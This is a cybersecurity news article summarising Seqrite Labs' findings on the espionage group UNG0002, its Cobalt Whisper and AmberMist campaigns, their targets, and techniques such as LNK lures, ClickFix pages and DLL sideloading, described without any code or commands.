.jpg?w=696&resize=696,0&ssl=1 "Weaponized LNK Files")
Cybersecurity researchers at Seqrite Labs have identified a sophisticated threat group, designated UNG0002, also known as Unknown Group 0002, which has been conducting extensive espionage operations across multiple Asian jurisdictions, including China, Hong Kong, and Pakistan.
The group has demonstrated remarkable persistence and adaptability, orchestrating two major campaigns that spanned over a year, with continuously evolving tactics and custom-developed malware implants.
Multi-Campaign Espionage Operations Target Critical Sectors
UNG0002’s operations encompass two distinct campaigns: Operation Cobalt Whisper, which was active from May 2024 to September 2024, and the more recent Operation AmberMist, running from January 2025 to May 2025.
During Operation Cobalt Whisper, researchers identified 20 infection chains that specifically targeted defense contractors, electrical engineering firms, and civil aviation organizations.
The threat actors demonstrated a strong preference for deploying Cobalt Strike and Metasploit frameworks alongside weaponized shortcut files (LNK) and VBScript components.
The evolution to Operation AmberMist marked a significant tactical shift, with the group expanding its target scope to include gaming companies, software development firms, and academic institutions.
This campaign introduced sophisticated custom implants, including Shadow RAT, Blister DLL Implant, and INET RAT, representing a departure from commercially available frameworks toward proprietary malware development.
Advanced Social Engineering and Technical Evasion Methods
A particularly concerning development in UNG0002’s arsenal is their adoption of the ClickFix technique, a social engineering method that manipulates victims into executing malicious PowerShell scripts through fraudulent CAPTCHA verification pages.
In one documented instance, the group spoofed Pakistan’s Ministry of Maritime Affairs website to deliver malicious payloads, demonstrating their willingness to impersonate government entities.
The threat actors consistently employ DLL sideloading techniques, abusing legitimate Windows applications such as Rasphone and Node-Webkit binaries to execute malicious payloads while evading detection systems.
This approach allows them to maintain persistence on compromised systems while appearing to utilize trusted software components.
Technical analysis reveals sophisticated, multi-stage attack chains that begin with malicious LNK files embedded within CV-themed decoy documents.
These documents feature realistic resume profiles, including fake credentials for game UI designers and computer science students from prestigious institutions, tailored to specific target industries.
Attribution and Geographic Focus
Seqrite Labs assesses with high confidence that UNG0002 originates from Southeast Asia, with a primary focus on espionage activities across the region.
The group demonstrates significant adaptability by mimicking techniques from established threat actor playbooks, thereby complicating attribution efforts.
Notable technical artifacts include PDB paths revealing development environments with codenames “Mustang” and “ShockWave,” potentially indicating deliberate mimicry of existing threat groups.
The persistent nature of UNG0002’s operations, combined with their systematic targeting of critical infrastructure sectors and government entities, positions this threat group as a significant concern for regional cybersecurity.
Their continuous evolution from commercially available tools to custom implants suggests substantial resources and long-term operational planning.
.jpg?resize=1600,900&ssl=1&description=Weaponized LNK Files - Cybersecurity researchers at Seqrite Labs have identified a sophisticated threat group, designated UNG0002.){kind=link}